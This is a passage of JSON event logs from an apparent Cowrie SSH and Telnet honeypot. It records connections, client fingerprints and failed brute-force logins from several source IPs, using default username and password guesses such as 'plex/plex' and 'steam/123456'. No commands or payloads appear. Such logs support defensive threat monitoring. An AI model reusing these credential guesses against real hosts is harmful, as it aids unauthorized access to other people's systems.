{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:39:03.394395Z","src_ip":"212.227.235.229","session":"38b30a28bbbc"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:39:03.829413Z","src_ip":"212.227.235.229","session":"38b30a28bbbc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:04.976343Z","src_ip":"212.227.235.229","session":"38b30a28bbbc"}
{"eventid":"cowrie.session.connect","src_ip":"47.236.171.46","src_port":49072,"dst_ip":"1.2.3.4","dst_port":23,"session":"29991f005bcb","protocol":"telnet","message":"New connection: 47.236.171.46:49072 (1.2.3.4:23) [session: 29991f005bcb]","sensor":"my-vps","timestamp":"2025-08-28T05:39:05.707051Z"}
{"eventid":"cowrie.session.connect","src_ip":"58.216.213.194","src_port":48620,"dst_ip":"1.2.3.4","dst_port":23,"session":"75b3b3858e09","protocol":"telnet","message":"New connection: 58.216.213.194:48620 (1.2.3.4:23) [session: 75b3b3858e09]","sensor":"my-vps","timestamp":"2025-08-28T05:39:18.197010Z"}
{"eventid":"cowrie.session.closed","duration":30.838033199310303,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:20.836766Z","src_ip":"212.227.235.229","session":"538b79020d17"}
{"eventid":"cowrie.session.closed","duration":31.006836414337158,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:21.010112Z","src_ip":"212.227.235.229","session":"8acb943e4168"}
{"eventid":"cowrie.session.closed","duration":"38.1","message":"Connection lost after 38.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:21.280813Z","src_ip":"212.227.125.160","session":"4fa86519db2d"}
{"eventid":"cowrie.session.closed","duration":13.153175830841064,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:31.350119Z","src_ip":"58.216.213.194","session":"75b3b3858e09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54376,"dst_ip":"1.2.3.4","dst_port":22,"session":"5302c697e9a7","protocol":"ssh","message":"New connection: 212.227.235.229:54376 (1.2.3.4:22) [session: 5302c697e9a7]","sensor":"my-vps","timestamp":"2025-08-28T05:39:35.794977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:39:35.796228Z","src_ip":"212.227.235.229","session":"5302c697e9a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:39:35.940291Z","src_ip":"212.227.235.229","session":"5302c697e9a7"}
{"eventid":"cowrie.session.closed","duration":30.66539692878723,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:36.372377Z","src_ip":"47.236.171.46","session":"29991f005bcb"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:39:36.374448Z","src_ip":"212.227.235.229","session":"5302c697e9a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:37.416902Z","src_ip":"212.227.235.229","session":"ed3fd3301438"}
{"eventid":"cowrie.session.closed","duration":180.2310013771057,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:37.421924Z","src_ip":"212.227.235.229","session":"ed3fd3301438"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:37.520619Z","src_ip":"212.227.235.229","session":"5302c697e9a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58144,"dst_ip":"1.2.3.4","dst_port":23,"session":"3505138c5a59","protocol":"telnet","message":"New connection: 212.227.235.229:58144 (1.2.3.4:23) [session: 3505138c5a59]","sensor":"my-vps","timestamp":"2025-08-28T05:39:41.579448Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33330,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd97762d4245","protocol":"ssh","message":"New connection: 212.227.125.160:33330 (1.2.3.4:22) [session: cd97762d4245]","sensor":"my-vps","timestamp":"2025-08-28T05:39:44.093832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:39:44.094893Z","src_ip":"212.227.125.160","session":"cd97762d4245"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:39:44.198195Z","src_ip":"212.227.125.160","session":"cd97762d4245"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-28T05:39:44.510509Z","src_ip":"212.227.125.160","session":"cd97762d4245"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:45.617022Z","src_ip":"212.227.125.160","session":"cd97762d4245"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46882,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b6551abb14a","protocol":"ssh","message":"New connection: 212.227.235.229:46882 (1.2.3.4:22) [session: 4b6551abb14a]","sensor":"my-vps","timestamp":"2025-08-28T05:39:47.537733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:39:47.538787Z","src_ip":"212.227.235.229","session":"4b6551abb14a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:39:47.682701Z","src_ip":"212.227.235.229","session":"4b6551abb14a"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-28T05:39:48.117967Z","src_ip":"212.227.235.229","session":"4b6551abb14a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:49.262949Z","src_ip":"212.227.235.229","session":"4b6551abb14a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59943,"dst_ip":"1.2.3.4","dst_port":23,"session":"d409c8297a9c","protocol":"telnet","message":"New connection: 212.227.235.229:59943 (1.2.3.4:23) [session: d409c8297a9c]","sensor":"my-vps","timestamp":"2025-08-28T05:39:54.522235Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":43124,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d691b5bf8c1","protocol":"telnet","message":"New connection: 8.222.212.69:43124 (1.2.3.4:23) [session: 3d691b5bf8c1]","sensor":"my-vps","timestamp":"2025-08-28T05:39:57.598159Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59168,"dst_ip":"1.2.3.4","dst_port":22,"session":"15cb41246b23","protocol":"ssh","message":"New connection: 212.227.125.160:59168 (1.2.3.4:22) [session: 15cb41246b23]","sensor":"my-vps","timestamp":"2025-08-28T05:39:57.933713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:39:57.934716Z","src_ip":"212.227.125.160","session":"15cb41246b23"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:39:58.037953Z","src_ip":"212.227.125.160","session":"15cb41246b23"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-28T05:39:58.451667Z","src_ip":"212.227.125.160","session":"15cb41246b23"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:39:59.597993Z","src_ip":"212.227.125.160","session":"15cb41246b23"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":43134,"dst_ip":"1.2.3.4","dst_port":23,"session":"51702adcb3b7","protocol":"telnet","message":"New connection: 8.222.212.69:43134 (1.2.3.4:23) [session: 51702adcb3b7]","sensor":"my-vps","timestamp":"2025-08-28T05:40:00.732653Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55154,"dst_ip":"1.2.3.4","dst_port":22,"session":"68de697b7928","protocol":"ssh","message":"New connection: 212.227.235.229:55154 (1.2.3.4:22) [session: 68de697b7928]","sensor":"my-vps","timestamp":"2025-08-28T05:40:02.274294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:40:02.276618Z","src_ip":"212.227.235.229","session":"68de697b7928"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:40:02.421346Z","src_ip":"212.227.235.229","session":"68de697b7928"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-28T05:40:02.856655Z","src_ip":"212.227.235.229","session":"68de697b7928"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:04.003131Z","src_ip":"212.227.235.229","session":"68de697b7928"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34356,"dst_ip":"1.2.3.4","dst_port":23,"session":"264debe3b866","protocol":"telnet","message":"New connection: 212.227.235.229:34356 (1.2.3.4:23) [session: 264debe3b866]","sensor":"my-vps","timestamp":"2025-08-28T05:40:12.300034Z"}
{"eventid":"cowrie.session.closed","duration":31.310985803604126,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:12.890360Z","src_ip":"212.227.235.229","session":"3505138c5a59"}
{"eventid":"cowrie.session.closed","duration":31.34329891204834,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:25.864100Z","src_ip":"212.227.235.229","session":"d409c8297a9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44332,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f70b00c14ae","protocol":"ssh","message":"New connection: 212.227.125.160:44332 (1.2.3.4:22) [session: 9f70b00c14ae]","sensor":"my-vps","timestamp":"2025-08-28T05:40:28.142783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:40:28.144000Z","src_ip":"212.227.125.160","session":"9f70b00c14ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:40:28.248788Z","src_ip":"212.227.125.160","session":"9f70b00c14ae"}
{"eventid":"cowrie.session.closed","duration":30.67006826400757,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:28.268154Z","src_ip":"8.222.212.69","session":"3d691b5bf8c1"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-28T05:40:28.566105Z","src_ip":"212.227.125.160","session":"9f70b00c14ae"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:29.673749Z","src_ip":"212.227.125.160","session":"9f70b00c14ae"}
{"eventid":"cowrie.session.closed","duration":31.49329662322998,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:32.225877Z","src_ip":"8.222.212.69","session":"51702adcb3b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46936,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2a2ba238521","protocol":"ssh","message":"New connection: 212.227.125.160:46936 (1.2.3.4:22) [session: d2a2ba238521]","sensor":"my-vps","timestamp":"2025-08-28T05:40:42.735108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:40:42.741232Z","src_ip":"212.227.125.160","session":"d2a2ba238521"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:40:42.855371Z","src_ip":"212.227.125.160","session":"d2a2ba238521"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:40:43.260770Z","src_ip":"212.227.125.160","session":"d2a2ba238521"}
{"eventid":"cowrie.session.closed","duration":31.533995628356934,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:43.833965Z","src_ip":"212.227.235.229","session":"264debe3b866"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:40:44.368488Z","src_ip":"212.227.125.160","session":"d2a2ba238521"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":44586,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c42092e89ab","protocol":"ssh","message":"New connection: 77.83.240.46:44586 (1.2.3.4:22) [session: 6c42092e89ab]","sensor":"my-vps","timestamp":"2025-08-28T05:40:46.755354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:40:46.756013Z","src_ip":"77.83.240.46","session":"6c42092e89ab"}
